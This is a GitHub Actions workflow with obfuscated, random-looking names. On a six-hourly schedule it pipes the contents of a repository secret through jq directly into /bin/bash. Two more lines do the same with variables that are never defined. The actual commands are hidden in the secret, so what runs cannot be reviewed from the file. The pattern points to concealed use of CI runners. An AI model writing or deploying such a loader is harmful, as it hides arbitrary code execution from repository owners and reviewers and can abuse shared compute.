name: wuzhishizu
on:
  workflow_dispatch:
  schedule:
    - cron: '36 4/6 * * *'
jobs:  # 22210
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wuzhishizu
        env:
          me3613: ${{ secrets.me3613 }}
        run: |
          echo $me3613 | jq -r .gdaj92 | /bin/bash
          echo $tzpk580 | jq -r .p445 | /bin/bash
          echo $nnry22242 | jq -r .wevae51 | /bin/bash

